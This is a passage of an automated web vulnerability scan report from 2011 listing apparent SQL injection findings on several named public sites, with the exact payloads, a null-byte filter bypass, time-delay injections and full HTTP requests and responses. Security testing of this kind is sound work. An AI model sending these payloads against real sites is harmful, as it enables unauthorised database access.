   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/C
...[SNIP]...
1.28. http://www.dealer.com/solutions/oem/media/uploads/page/loading.gif [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /solutions/oem/media/uploads/page/loading.gif

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /solutions/oem/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/oem/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=1; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003121; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fsolutions%2Foem%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586'%20and%201%3d1--%20; __utmb=161351586.56.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20122
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:27:57 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003676; expires=Mon, 16-Apr-2012 01:27:56 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Dealer.com is always looking for ways to improve, so they're intense in that. They're never standing still and their service is impeccable.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We depend very heavily on the SEO team at Dealer.com to ensure that our goals are accomplished as it relates to where we show up in the search engines.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We went from a site that was converting at a rate of 2 or 3 percent. Now we&#8217;re converting at 10, 11, 12, 13 percent depending on the month.</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Throughout my first few years here, researching and developing both a website and the Internet Sales Department for this dealership, I have used several nationally known Internet Service Providers (ISP). Dealer.com ended up the clear winner for more reasons than I &#8230;</p>
   <cite>Mike Poulin, Shearer Pontiac Cadillac Hummer</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Dealer.com's backend tool is definitely the best in the industry. I like the simplicity of one login, and how all the webstats are one click away.</p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertisi
...[SNIP]...

Request 2

GET /solutions/oem/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/oem/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=1; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003121; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fsolutions%2Foem%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586'%20and%201%3d2--%20; __utmb=161351586.56.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20153
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:27:58 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003678; expires=Mon, 16-Apr-2012 01:27:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>I really enjoy being able to go in and add a page, create the meta data for that page, and immediately have it show up. It has been tremendously helpful for us.</p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We were looking for an all-in-one solution&#8212;one company with expertise in all the different fields. That is why we chose Dealer.com. </p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We went from a site that was converting at a rate of 2 or 3 percent. Now we&#8217;re converting at 10, 11, 12, 13 percent depending on the month.</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Everyday we are told about how great our site is and how easy it is to get information from. We recently started a billboard campaign called "Shop in Your Underwear at Stevebaldo.com" to capture the majority of customers already online doing &#8230;</p>
   <cite>Sheila K. Snyder, Steve Baldo Dealerships</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
...[SNIP]...
1.29. http://www.gabbr.com/inc/fauxMenu.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gabbr.com
Path:   /inc/fauxMenu.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /inc%00'/fauxMenu.css HTTP/1.1
Host: www.gabbr.com
Proxy-Connection: keep-alive
Referer: http://www.gabbr.com/submit'/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0499a3333cddafe009316e3c383858cf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 17:48:37 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 35621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>
...[SNIP]...
1.30. http://www.gabbr.com/inc/fauxMenu.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gabbr.com
Path:   /inc/fauxMenu.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /inc/fauxMenu.css%00' HTTP/1.1
Host: www.gabbr.com
Proxy-Connection: keep-alive
Referer: http://www.gabbr.com/submit'/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0499a3333cddafe009316e3c383858cf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 17:48:40 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 35620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>
...[SNIP]...
1.31. http://www.gabbr.com/submit/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gabbr.com
Path:   /submit/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /submit'/ HTTP/1.1
Host: www.gabbr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 17:27:46 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=0499a3333cddafe009316e3c383858cf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 35717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>
...[SNIP]...
1.32. http://www.info.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.info.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.219CKMLO; path=/
Date: Sun, 17 Apr 2011 16:59:34 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17802

<html><head>
       <title>Info.com - Search the Web</title>
   <meta name=keywords content="Info,information,Search,Searches,Searching,Searchers,Advanced search,Search Help,Search guide,Search tips,Search t
...[SNIP]...
<img src="http://gfx.info.com/common/images/index/int.gif" alt="Info.com - We search further..." border=0 /></a><div style="height:18px"></div>
<div style="margin-top:15px"></div><table cellpadding=0 cellspacing=0 border=0 width="100%" style="padding:0px 10px;clear:both">
<tr><td align="center"><table id=inftop nowrap cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<td valign=bottom align="center">
<table cellpadding=0 cellspacing=0 border=0 nowrap align=center><tr>
<td><table cellpadding=0 cellspacing=0 border=0><tr valign=top>
<td class=t><a style="border:0" style="color:#003399;text-decoration:none" title="Search the Web">Web</a><div style="clear:both;text-align:center;margin:0 5px;margin-bottom:2px;border-top:1px solid #003399"><img src="http://gfx.info.com/common/images/dip.gif" border="0" width="11" height="6" style="margin-top:-1px;background:#003399" /></div></td><td class=t><a style="" href="http://topics.Info.com/?qcat=Topics" onMouseOver="this.style.color='#001538';" onMouseOut="this.style.color='';" onClick="return c('http://topics.Info.com/','Topics',event,'http://topics.Info.com/');" title="Interesting topics and helpful facts">Topics <small style="vertical-align:text-top;font-size:8px;font-weight:bold;color:red">NEW</small></a></td><td class=t><a style="" href="http://research.Info.com/searchw?qcat=Reference" onMouseOver="this.style.color='#583B0C';" onMouseOut="this.style.color='';" onClick="return c('http://research.Info.com/searchw','Reference',event,'http://research.Info.com/');" title="Search for online references">Research</a></td><td class=t><a style="" href="http://jobs.info.com/jobs?qcat=Jobs" onMouseOver="this.style.color='#1E7D5C';" onMouseOut="this.style.color='';" onClick="return c('http://jobs.info.com/jobs','Jobs',event,'http://Info.com/?qcat=jobs');" title="Search for jobs">Jobs</a></td><td class=t><a style="" href="http://flights.info.com/flights?qcat=Flights?qcat=Flights" onMouseOver="this.style.color='#0184FF';" onMouseOut="this.style.color='';" onClick="return c('http://flights.info.com/flights?q
...[SNIP]...

Request 2

GET /?1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.219CKMLO; path=/
Date: Sun, 17 Apr 2011 16:59:34 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17817

<html><head>
       <title>Info.com - Search the Web</title>
   <meta name=keywords content="Info,information,Search,Searches,Searching,Searchers,Advanced search,Search Help,Search guide,Search tips,Search t
...[SNIP]...
<img src="http://gfx.info.com/common/images/index/int.gif" alt="Info.com - Your independent search platform..." border=0 /></a><div style="height:18px"></div>
<div style="margin-top:15px"></div><table cellpadding=0 cellspacing=0 border=0 width="100%" style="padding:0px 10px;clear:both">
<tr><td align="center"><table id=inftop nowrap cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<td valign=bottom align="center">
<table cellpadding=0 cellspacing=0 border=0 nowrap align=center><tr>
<td><table cellpadding=0 cellspacing=0 border=0><tr valign=top>
<td class=t><a style="border:0" style="color:#003399;text-decoration:none" title="Search the Web">Web</a><div style="clear:both;text-align:center;margin:0 5px;margin-bottom:2px;border-top:1px solid #003399"><img src="http://gfx.info.com/common/images/dip.gif" border="0" width="11" height="6" style="margin-top:-1px;background:#003399" /></div></td><td class=t><a style="" href="http://topics.Info.com/?qcat=Topics" onMouseOver="this.style.color='#001538';" onMouseOut="this.style.color='';" onClick="return c('http://topics.Info.com/','Topics',event,'http://topics.Info.com/');" title="Interesting topics and helpful facts">Topics <small style="vertical-align:text-top;font-size:8px;font-weight:bold;color:red">NEW</small></a></td><td class=t><a style="" href="http://research.Info.com/searchw?qcat=Reference" onMouseOver="this.style.color='#583B0C';" onMouseOut="this.style.color='';" onClick="return c('http://research.Info.com/searchw','Reference',event,'http://research.Info.com/');" title="Search for online references">Research</a></td><td class=t><a style="" href="http://jobs.info.com/jobs?qcat=Jobs" onMouseOver="this.style.color='#1E7D5C';" onMouseOut="this.style.color='';" onClick="return c('http://jobs.info.com/jobs','Jobs',event,'http://Info.com/?qcat=jobs');" title="Search for jobs">Jobs</a></td><td class=t><a style="" href="http://flights.info.com/flights?qcat=Flights?qcat=Flights" onMouseOver="this.style.color='#0184FF';" onMouseOut="this.style.color='';" onClick="return c('http://flights.inf
...[SNIP]...
1.33. http://www.linkagogo.com/go/AddNoPopup [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.linkagogo.com
Path:   /go/AddNoPopup

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /go/AddNoPopup?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 17:33:19 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS9khhcA"
Last-Modified: Sun, 17 Apr 2011 17:33:20 GMT
Cache-Control: no-cache
Expires: 0
Set-Cookie: cookies=Y; path=/
Set-Cookie: user=-1; path=/; expires=Sat, 07-Apr-2012 17:33:18 GMT
Set-Cookie: userName=guest; path=/; expires=Sat, 07-Apr-2012 17:33:18 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 17084

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_smart.xml" title="linkaGoGo Smart Bookmarks" />
<META HTTP-EQUIV="Expires" CONTENT="0">
<head><title>Add bookmark</title>
<style>
a:link {color:#0000FF}
a:visited {color:#800080}
a.menu {text-decoration:none;color:#000000;background:#9999FF }
a.menu2 {text-decoration:none;color:#000000;background:#CCCCFF }
a.menu:link {color:#000000}
a.menu:visited {color:#000000}
a.menu:hover {color:white;background:#0000C0}
a.menu:active {color:#000000;background:#9999FF}
a.menu2:link {color:#000000}
a.menu2:visited {color:#000000}
a.menu2:hover {color:white;background:#0000C0}
a.menu2:active {color:#000000;background:#CCCCFF}
a.donate {text-decoration:none;color:#000000;background:#9999FF}
a.donate:link {color:#000000}
a.donate:visited {color:#000000}
a.donate:hover {color:white;background:#0000C0}
a.donate:active {color:#000000;background:#9999FF}
.menuskin{position:absolute;width:165px;background-color:#FFFFC6;border:2px solid silver;font:normal 12px verdana;line-height:16px;z-index:100;visibility:hidden;}
.menuskin a{text-decoration:none;color:black;padding-left:10px;padding-right:10px;}
.menuskin a:visited{text-decoration:none;color:black;padding-left:10px;padding-right:10px;}

#mouseoverstyle{background-color:highlight;}
#mouseoverstyle a{color:white;}
a.pl:hover {color:white;background:#0000C0}
.popup
{
position:absolute; left:0; top:2; width:132;
border-style:solid;
border-width:4;
border-color:#CCCCFF;
background-color:#FFFFC6;
padding:2px;
font
...[SNIP]...

Request 2

GET /go/AddNoPopup?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 17:33:19 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS9khhcA"
Last-Modified: Sun, 17 Apr 2011 17:33:20 GMT
Cache-Control: no-cache
Expires: 0
Set-Cookie: user=-1; path=/; expires=Sat, 07-Apr-2012 17:33:19 GMT
Set-Cookie: userName=guest; path=/; expires=Sat, 07-Apr-2012 17:33:19 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 17084

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_smart.xml" title="linkaGoGo Smart Bookmarks" />
<META HTTP-EQUIV="Expires" CONTENT="0">
<head><title>Add bookmark</title>
<style>
a:link {color:#0000FF}
a:visited {color:#800080}
a.menu {text-decoration:none;color:#000000;background:#9999FF }
a.menu2 {text-decoration:none;color:#000000;background:#CCCCFF }
a.menu:link {color:#000000}
a.menu:visited {color:#000000}
a.menu:hover {color:white;background:#0000C0}
a.menu:active {color:#000000;background:#9999FF}
a.menu2:link {color:#000000}
a.menu2:visited {color:#000000}
a.menu2:hover {color:white;background:#0000C0}
a.menu2:active {color:#000000;background:#CCCCFF}
a.donate {text-decoration:none;color:#000000;background:#9999FF}
a.donate:link {color:#000000}
a.donate:visited {color:#000000}
a.donate:hover {color:white;background:#0000C0}
a.donate:active {color:#000000;background:#9999FF}
.menuskin{position:absolute;width:165px;background-color:#FFFFC6;border:2px solid silver;font:normal 12px verdana;line-height:16px;z-index:100;visibility:hidden;}
.menuskin a{text-decoration:none;color:black;padding-left:10px;padding-right:10px;}
.menuskin a:visited{text-decoration:none;color:black;padding-left:10px;padding-right:10px;}

#mouseoverstyle{background-color:highlight;}
#mouseoverstyle a{color:white;}
a.pl:hover {color:white;background:#0000C0}
.popup
{
position:absolute; left:0; top:2; width:132;
border-style:solid;
border-width:4;
border-color:#CCCCFF;
background-color:#FFFFC6;
padding:2px;
font-family:Arial;
font-size:10p
...[SNIP]...
1.34. http://www.longislanderotic.com/longislanderotic/forum/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.longislanderotic.com
Path:   /longislanderotic/forum/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /longislanderotic/forum/ HTTP/1.1
Host: www.longislanderotic.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=',0,0,0)waitfor%20delay'0%3a0%3a20'--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 17:42:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: WWF=SID=zb688d2ede1dz9157b8c16f4219bdeaz; path=/longislanderotic
Set-Cookie: ASPSESSIONIDQSBBADSQ=NBMDCGFBPOLHPEEEBPKECEJF; path=/
Cache-control: private

<br /><strong>Server Error in Forum Application</strong><br />An error has occured while writing to the database.<br />Please contact the forum administrator.<br /><br /><strong>Support Error Code:-</
...[SNIP]...
<br />Microsoft OLE DB Provider for SQL Server<br />
...[SNIP]...
1.35. http://www.longislanderotic.com/longislanderotic/forum/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.longislanderotic.com
Path:   /longislanderotic/forum/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /longislanderotic/forum/ HTTP/1.1
Host: www.longislanderotic.com
Proxy-Connection: keep-alive
Referer: http://www.longislanderotic.com/landing.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'waitfor%20delay'0%3a0%3a20'--
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 17:42:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: WWF=SID=ad4cb67z3a8628b6bffb54b233f51795; path=/longislanderotic
Set-Cookie: ASPSESSIONIDQSBBADSQ=FPLDCGFBBPDEDDINHNGIAFIH; path=/
Cache-control: private

<br /><strong>Server Error in Forum Application</strong><br />An error has occured while writing to the database.<br />Please contact the forum administrator.<br /><br /><strong>Support Error Code:-</
...[SNIP]...
